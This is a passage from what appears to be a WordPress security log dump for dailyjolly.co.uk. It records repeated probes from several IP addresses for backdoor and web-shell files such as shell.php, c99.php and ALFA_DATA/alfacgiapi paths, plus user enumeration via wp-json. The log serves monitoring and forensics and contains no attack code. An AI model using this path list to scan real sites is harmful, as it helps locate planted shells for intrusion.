1t.php',0,19,0),('20.84.48.39',341061671,'',0,1674233015.7490,55,'5RX4Gb6H9MrDfNwEuTi1BZos','','19|0|0|0|dailyjolly.co.uk/0byte.php',0,19,0),('20.84.48.39',341061671,'',0,1674233086.9525,55,'beCMvqHW7OlTKfQoZzaUXxhc','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('20.84.48.39',341061671,'',0,1674233159.7258,55,'dOA19YsWeP3i8KkqmINwp60E','','19|0|0|0|dailyjolly.co.uk/41.php',0,19,0),('20.84.48.39',341061671,'',0,1674233266.3346,55,'LvSlCieKyRXGt9P1uO7Ek5nH','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('20.84.48.39',341061671,'',0,1674233334.4426,55,'lLgodE5ap0HWehsJ7nmtr1CF','','19|0|0|0|dailyjolly.co.uk/4price.php',0,19,0),('20.84.48.39',341061671,'',0,1674233403.7480,55,'JnV2eChrLZD1XazORU3kN6sE','','19|0|0|0|dailyjolly.co.uk/MARIJUANA.php',0,19,0),('20.84.48.39',341061671,'',0,1674233404.0923,55,'C3OM8Ag0ikuLxESQfbq9PB4s','','19|0|0|0|dailyjolly.co.uk/marijuana.php',0,19,0),('20.84.48.39',341061671,'',0,1674233475.8974,55,'Lszen0i9bkR2NqhoAEd5yKuM','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('20.84.48.39',341061671,'',0,1674233509.1189,55,'1yn3dcYApPELRiTzMbgF8S6q','','19|0|0|0|dailyjolly.co.uk/.fk.php',0,19,0),('20.84.48.39',341061671,'',0,1674233544.7378,55,'MCGi123kZrwPaQnczOJ4mjI5','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('20.84.48.39',341061671,'',0,1674233716.1814,55,'Y5AjIThMCr1aEbt3q0yOFJH6','','19|0|0|0|dailyjolly.co.uk/xox.php',0,19,0),('20.84.48.39',341061671,'',0,1674233750.3559,55,'RNMy5rSbOZVYe7kI496aTCtl','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('20.84.48.39',341061671,'',0,1674233785.9406,55,'MvJAcbiIWo97zeN1K3Qp0sBt','','19|0|0|0|dailyjolly.co.uk/new.php',0,19,0),('20.84.48.39',341061671,'',0,1674233786.3158,55,'NLZ4TX6WFCuUErS9K153ft0Y','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('20.84.48.39',341061671,'',0,1674233858.1072,55,'kMFuyELlYaX40D2v5KQVzTIm','','19|0|0|0|dailyjolly.co.uk/sindex.php',0,19,0),('20.84.48.39',341061671,'',0,1674233892.8694,55,'52TctuA8UPRCFpOBhs1wEIjS','','19|0|0|0|dailyjolly.co.uk/baindex.php',0,19,0),('20.84.48.39',341061671,'',0,1674233928.8068,55,'V05E63cK2zdGMtYsjDNehZb1','','19|0|0|0|dailyjolly.co.uk/new-index.php',0,19,0),('20.84.48.39',341061671,'',0,1674234105.9555,55,'r6l7XD5OThx4ucNRInFdq0AL','','19|0|0|0|dailyjolly.co.uk/wi.php',0,19,0),('20.84.48.39',341061671,'',0,1674234140.8546,55,'R3YuAZ1yJFcKopUkvXigD4Lw','','19|0|0|0|dailyjolly.co.uk/XxX.php',0,19,0),('20.84.48.39',341061671,'',0,1674234245.2257,55,'yABnoW4PwqkUrxfE1hQmzDge','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('20.84.48.39',341061671,'',0,1674234280.7800,55,'omEwdYyHWb8MiT9n5tr2PZgC','','19|0|0|0|dailyjolly.co.uk/root.php',0,19,0),('20.84.48.39',341061671,'',0,1674234428.0087,55,'rags1c5pQFjdLoZzBWMDhlne','','19|0|0|0|dailyjolly.co.uk/11index.php',0,19,0),('20.84.48.39',341061671,'',0,1674234499.4601,55,'hNtgemfyPGW0842EXQn5zrHU','','19|0|0|0|dailyjolly.co.uk/nee.php',0,19,0),('20.84.48.39',341061671,'',0,1674234536.5975,55,'J6x78MR9YTI1mnBCWuKgF5Dh','','19|0|0|0|dailyjolly.co.uk/v.php',0,19,0),('20.84.48.39',341061671,'',0,1674234606.2451,55,'I16Wrxp3RlTVjfneyaYiN74K','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('20.84.48.39',341061671,'',0,1674234681.2260,55,'V1G2g04LF75HncIURkCK9tjm','','19|0|0|0|dailyjolly.co.uk/xx.php',0,19,0),('20.84.48.39',341061671,'',0,1674234716.1606,55,'AqSWwcKQD4BEHrgvP9T7l0zJ','','19|0|0|0|dailyjolly.co.uk/g.php',0,19,0),('20.84.48.39',341061671,'',0,1674234716.5880,55,'QjHfVPGkxCWgbDUqvpJh3oem','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('20.84.48.39',341061671,'',0,1674234754.8444,55,'Z12FCif9gSbAXJLrUTMW0IYj','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('20.84.48.39',341061671,'',0,1674234791.0785,55,'JtawFLVjbuECp5zv2SBmyI3W','','19|0|0|0|dailyjolly.co.uk/sh3ll.php',0,19,0),('20.84.48.39',341061671,'',0,1674234828.4741,55,'KDeOJIH6U08BliCgLpSoNt3y','','19|0|0|0|dailyjolly.co.uk/c99.php',0,19,0),('20.84.48.39',341061671,'',0,1674234901.3201,55,'4JOEv2LdflPZbmG5Cko8FRtU','','19|0|0|0|dailyjolly.co.uk/alexuse.php',0,19,0),('20.84.48.39',341061671,'',0,1674234976.0794,55,'1MfBFaZR2JyskHY5469lujL7','','19|0|0|0|dailyjolly.co.uk/w.php',0,19,0),('20.84.48.39',341061671,'',0,1674235051.0059,55,'sR0IyQwCWmDi9NG1Vg85qYhJ','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('20.84.48.39',341061671,'',0,1674235165.4501,55,'avB8WZmb1iUrLgSXFJzRPdkH','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('20.84.48.39',341061671,'',0,1674235201.0676,55,'nwp0J4oafkUIercSOB39gMmH','','19|0|0|0|dailyjolly.co.uk/lol.php',0,19,0),('20.84.48.39',341061671,'',0,1674235310.3498,55,'xHkg32yAlT4fuqM1e7n6IGNj','','19|0|0|0|dailyjolly.co.uk/87.php',0,19,0),('20.84.48.39',341061671,'',0,1674235423.4534,55,'qAKxoPRQrhGbsXFlyICag7dS','','19|0|0|0|dailyjolly.co.uk/7yn.php',0,19,0),('20.84.48.39',341061671,'',0,1674235571.6382,55,'IQslhnH8c5o0tduBbqLg9rpv','','19|0|0|0|dailyjolly.co.uk/wp-content/marijuana.php',0,19,0),('20.84.48.39',341061671,'',0,1674235606.5950,55,'Hdcin3jJPUCgGZ1krfBF9QWx','','19|0|0|0|dailyjolly.co.uk/haxor.php',0,19,0),('20.84.48.39',341061671,'',0,1674235642.9089,55,'Y8BCXgSrGcajUbEQT2Pzdpnk','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('20.84.48.39',341061671,'',0,1674235715.4828,55,'rlk5xMvoBt8n6qN2dmiHaGCL','','19|0|0|0|dailyjolly.co.uk/13.php',0,19,0),('20.84.48.39',341061671,'',0,1674235893.9303,55,'VW9KcTyuDMF3mAxpQ2nEeSPt','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/xwp/up.php',0,19,0),('20.84.48.39',341061671,'',0,1674235932.2596,55,'1t7QOHubAPEVpRN5Wo4Mf3rv','','19|0|0|0|dailyjolly.co.uk/cpanel.php',0,19,0),('213.189.216.162',3585988770,'',0,1674256368.3050,55,'QonvpxVfklDjbE9ty2UhKiOH','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('128.199.153.103',2160564583,'',0,1674279365.1964,55,'POdV5gcCwFzah7WExpLBy92f','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('128.199.153.103',2160564583,'',0,1674279365.4117,55,'xAwrE8ZWgeiJn69cUb4dNmLD','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('43.130.154.185',729979577,'',0,1674285986.5095,55,'1ponHbrEW2GBQqLUOMeR70XI','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('20.14.84.163',336483491,'',0,1674293183.7740,55,'j6tQvkSoIG1NaU4wJf5PCMRb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('20.14.84.163',336483491,'',0,1674293184.7802,55,'VUpTZbRKg7dnxaz51hEuQM6I','','19|0|0|0|www.dailyjolly.co.uk/wp-content/theme/seotheme/db.php',0,19,0),('20.14.84.163',336483491,'',0,1674293185.7409,55,'nk7JE94SiypC1ju2KA0UGzcH','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('20.14.84.163',336483491,'',0,1674293187.6707,55,'9luVJ1FsbnvRikKzmNxdOo7Z','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('20.14.84.163',336483491,'',0,1674293188.6502,55,'uN5n9x3IG1JRyp2awFMeUZcS','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.14.84.163',336483491,'',0,1674293188.7694,10,'uN5n9x3IG1JRyp2awFMeUZcS','','707|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,707,0),('20.14.84.163',336483491,'',0,1674293291.3623,70,'40R7hdIOPW8toE9KUkaMilVe','','13|0|0|0|www.dailyjolly.co.uk/wp-json/',0,13,0),('20.14.84.163',336483491,'',0,1674293402.4629,70,'xunaBdzgU4J7MbLOqyTV5wZD','','13|0|0|0|www.dailyjolly.co.uk/wp-json/wp/v2/users/',0,13,0),('20.14.84.163',336483491,'',0,1674293431.8828,100,'ZIvnCsAtGzLgT94NcYKu8V6i','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/db.php',0,13,0),('20.14.84.163',336483491,'',0,1674293432.7795,55,'ldEKDg8BNzbMT957Snp4q2ra','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/index.php',0,19,0),('20.14.84.163',336483491,'',0,1674293433.7055,55,'PAgk8BOzd0rWThwJQaUMCDov','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('20.14.84.163',336483491,'',0,1674293434.6719,55,'HyFEctRLdZKTSkx9YalJn8D5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/css.php',0,19,0),('20.14.84.163',336483491,'',0,1674293445.1671,55,'SBgXyep1C4OtzPEIvDNHd2Ja','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('20.14.84.163',336483491,'',0,1674293446.0835,55,'fHXBrAiFJj6VD8KYxQTW2u9L','','19|0|0|0|www.dailyjolly.co.uk/wp-content/admin.php',0,19,0),('20.14.84.163',336483491,'',0,1674293447.2662,55,'VdoU49bItiBSevhG3TlgmfaR','','19|0|0|0|www.dailyjolly.co.uk/wp-content/utchiha-ZKOZ.php',0,19,0),('20.14.84.163',336483491,'',0,1674293448.2152,100,'FVyhCEKlpRjoAOWG5IY2uJs9','','13|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,13,0),('20.14.84.163',336483491,'',0,1674293449.2100,55,'yPoaQzTGpik6mNUlAHxIBVRO','','19|0|0|0|www.dailyjolly.co.uk/lufix.php',0,19,0),('20.14.84.163',336483491,'',0,1674293450.1547,55,'iGnf0tWclMko5UQTvg4LadR3','','19|0|0|0|www.dailyjolly.co.uk/upl.php',0,19,0),('20.14.84.163',336483491,'',0,1674293450.8480,18,'bq8mAz1curSh5KFykxwn9pZi','','13|0|0|0|www.dailyjolly.co.uk/upl.php',0,13,0),('217.107.34.211',3647677139,'',0,1674303240.8876,55,'VfIWkGJNh8SMj30eugU2rCXF','','19|0|0|0|www.dailyjolly.co.uk/wp-reset.php',0,19,0),('35.183.107.9',599223049,'',0,1674312214.6634,55,'pTC1xMim3uv9XtEBUQnS7q8O','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674312215.5453,55,'jEg9mn5yraQb3VY6uGXDIvWT','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674312216.3607,55,'zxI4B0Vg68EyDGkvdruYeF7i','','19|0|0|0|www.dailyjolly.co.uk/alfacgiapi/404.php',0,19,0),('35.183.107.9',599223049,'',0,1674312220.3250,55,'wuGe2TK1WBtAhQEYSM5afIzb','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674312220.7397,55,'q8ehrlPJtNV13CbKx0d9U4oY','','19|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674312220.7943,10,'q8ehrlPJtNV13CbKx0d9U4oY','','707|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/radio.php',0,707,0),('35.183.107.9',599223049,'',0,1674312221.1448,100,'sE2i56FtcxrN30HeC8AXTOYZ','','13|0|0|0|www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312225.8105,100,'mOSTNC963oWxfjBQzv120KMA','','13|0|0|0|www.dailyjolly.co.uk/assets/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312226.3118,100,'Vy7e1KakNQ9ZlMpU3wYjtCO2','','13|0|0|0|www.dailyjolly.co.uk/assets/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312226.6859,100,'LnxDpvrKO3jThuPeVdwoB90U','','13|0|0|0|www.dailyjolly.co.uk/assets/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312232.4426,100,'CzBTaWVpvEgyG2PZIwFiN8r0','','13|0|0|0|www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312232.8356,100,'VW3IqEkFusevdLPziKma0jHt','','13|0|0|0|www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312233.2142,100,'kQjBGR9ueCrMZ5xXVw8slyqv','','13|0|0|0|www.dailyjolly.co.uk/assets/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312238.6292,100,'rEotMuFWGNIT0Xzs1w4Q9mOx','','13|0|0|0|www.dailyjolly.co.uk/upload/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312238.9981,100,'DUgJNlX92QowPb48uYdzk1L0','','13|0|0|0|www.dailyjolly.co.uk/upload/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312239.3690,100,'jg6OkeI3d5zXF4hMCpEtmsGw','','13|0|0|0|www.dailyjolly.co.uk/upload/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312244.4267,100,'FEPqb9lR30JuhCUzerjS7tgc','','13|0|0|0|www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312244.7911,100,'gdSI1i0b4XOeP5WBk3rxuM6z','','13|0|0|0|www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312245.1620,100,'RoOGmP1WediKLxAUSkCuypIc','','13|0|0|0|www.dailyjolly.co.uk/upload/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312249.1919,100,'wF0MZrv3Tp6zHx4afSDQOiXB','','13|0|0|0|www.dailyjolly.co.uk/uploads/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312249.5863,100,'E3cFeitYbpfykUXGJ47qoIOB','','13|0|0|0|www.dailyjolly.co.uk/uploads/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312249.9692,100,'91waCSMzJIjFQPX6NqUW82AL','','13|0|0|0|www.dailyjolly.co.uk/uploads/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312255.6090,100,'cGuhWQSgv5At6ibMkEDXyjxr','','13|0|0|0|www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312256.0374,100,'kD3jCdHLKoFTOcBXlQYhbzst','','13|0|0|0|www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312256.3799,100,'l72TJdc36w9qItopyYWZX8Rs','','13|0|0|0|www.dailyjolly.co.uk/uploads/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312262.1147,100,'uMFeN8VxEwkWGtsnhaYmDdJ9','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312262.5167,100,'A6JqgWTcYZhtbk91yR2zBxDS','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312262.9043,100,'AorfdDJvIUewTXRhZkLMb7ig','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312268.0202,100,'7y4eDW3jh5JpQiz0aFbUEmCK','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312268.3935,100,'wuitCEr9hVjBslp28dR3NUTF','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312268.7429,100,'YvRBCfO5s2ZrpaNL3PmUAgkH','','13|0|0|0|www.dailyjolly.co.uk/assets/upload/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312273.2638,100,'2sknWRI13aBcpqNyKCVlSAFL','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312273.6085,100,'zSwYEflhOsb9M6j7TKgr0Xn3','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312273.9642,100,'KAzfTw6GOn0katuX1phRYVdF','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312279.5355,100,'3xTk6OrUYL1cgoKBFdPzV9ne','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312279.9537,100,'3TIxqMWwmudyKNOoJSZb9P4A','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312280.5248,100,'qNA1y9tw8fDaseWm6LTVgZ2C','','13|0|0|0|www.dailyjolly.co.uk/assets/uploads/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312286.3026,100,'ghT2MQWSqALvGPiH9tBkadY8','','13|0|0|0|www.dailyjolly.co.uk/wp-content/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312286.7120,100,'xvqlCU7mFcZGiVN0fkAbX8TS','','13|0|0|0|www.dailyjolly.co.uk/wp-content/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312287.1006,100,'vJoNW2chXaP51jK8wu76lked','','13|0|0|0|www.dailyjolly.co.uk/wp-content/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312292.9359,100,'cZDoMSR3B5OydsvWikfXrx8z','','13|0|0|0|www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312293.3843,100,'yh5nGkYWa9m3jg6Hr7d21ef8','','13|0|0|0|www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312293.7357,100,'x69AzjRqtl1eBSigys8p52CJ','','13|0|0|0|www.dailyjolly.co.uk/wp-content/ALFA_DATA/alfacgiapi/wp-content/uploads/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312297.4222,100,'oG4vdglYIDrynP980HWjRTZt','','13|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312297.7866,100,'U7LZXC5EfiBcVkljmOyzrSvG','','13|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312298.1644,100,'CwaInSqFhTZWyV1jkREgOPm4','','13|0|0|0|www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312301.9279,100,'KXaprWlQt4fSNoJBeFL1wIqc','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312302.3100,100,'aGU3ycdgT4QEh6SLVKBfzm1Y','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312302.7561,100,'cwoWXCvSpsbExyfeIrVBQ7NU','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312307.1716,100,'KEVO7Ilq2domk0WiM9ALrYPU','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312307.5555,100,'XuSo5D0E4WclbVLtgU9JHaK8','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312308.0735,100,'gT0PrwyOMvxDe34WAnGcVizh','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312311.4503,100,'kMqBc4mONG5X3WRtvZrxwloA','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312311.8229,100,'yc8ijVsz37BfKv1DHWYGohma','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312312.5490,100,'FwvbYZUTLuChExAJimVoHzKD','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312316.0067,100,'y12r0eWmwvXQPB5R4T8tKlxZ','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312316.3379,100,'ZlTCWiGj53eRsJ0vLXIfMY48','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312316.6903,100,'4TA1srpBxiQXjN9dqDygetEP','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312320.0232,100,'geQ9WyF0HvhqsnmjSxrLd36u','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312320.4006,100,'f3S2h8KsOGtxgL4zDkNTnlZ7','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312320.7805,100,'v7eT1RNWCFPYqXhw2dbOZfLA','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312324.1854,100,'pTwDu16oNW5qHOZmJaG9Af2v','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312324.5593,100,'E2n5o0yHxVtZv9CK3s78JzNi','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312324.8972,100,'JWu3okB7mneaP6wXUqlvDEAb','','13|0|0|0|www.dailyjolly.co.uk/wp-content/upgrade/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312328.3094,100,'NYzxlqTLvdSWO5uw81RmQ9yP','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312328.6487,100,'9eufMwD6QNVyXJYqxat7Kb1d','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312328.9871,100,'mHbMuB2sUJ4lG3vT1Nhnzq9c','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312332.5485,100,'1JXGexqazudM3b6hl7sfwCtI','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312332.8929,100,'9mkqPzo8nBRxveMyAfUict0I','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312333.2430,100,'chZx67pFJnD3lWYzLaf4wPSd','','13|0|0|0|www.dailyjolly.co.uk/wp-content/updraft/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312336.8232,100,'SVqdJfQruM34b85x2En0p1HA','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312337.1643,100,'wBHcXeTkn8PZb71ESRNqtFjV','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312337.5048,100,'z1Yc4GJOMeDo2TgqjhRdsutf','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312340.7712,100,'1AC7atcKYIVRJbofkGXlLymr','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312341.1054,100,'ISDtmuFWJoTvLxcKURfGCPaB','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312341.4433,100,'M2iPZcEbrUJ3sFOWN9o6jl7m','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/library/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312344.7661,100,'DRAOEej2PSVQvN5waGi9uYWz','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312345.1005,100,'uFY1pjM5HdXgbUy6O3BWrZ9L','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312345.4419,100,'s06FDokRr5EydnVAvIlHtb21','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312348.7468,100,'Qgi4Kt2HXDoGcYFT6Oq5R3Bk','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312349.0925,100,'YaF9pGtJ62jmxb1gCHNhX4IZ','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312349.4262,100,'fQT2i48PjKsZOAYhSe0UH3kd','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/ALFA_DATA/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312352.8780,100,'RZ23fGnYCQeSIwsDVFavWXHu','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312353.2732,100,'nZU6tdQsECoFkfbap5vOmVGc','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/alfacgiapi/radio.php',0,13,0),('35.183.107.9',599223049,'',0,1674312353.6261,100,'DfNsgPaRdp41bSVUhnLHQ5lI','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/alfacgiapi/404.php',0,13,0),('35.183.107.9',599223049,'',0,1674312356.8954,100,'kKw8CxeEabqlpRmV3IUYdNci','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php',0,13,0),('35.183.107.9',599223049,'',0,1674312357.2456,100,'KzVRQtGovAqCTyD0PB7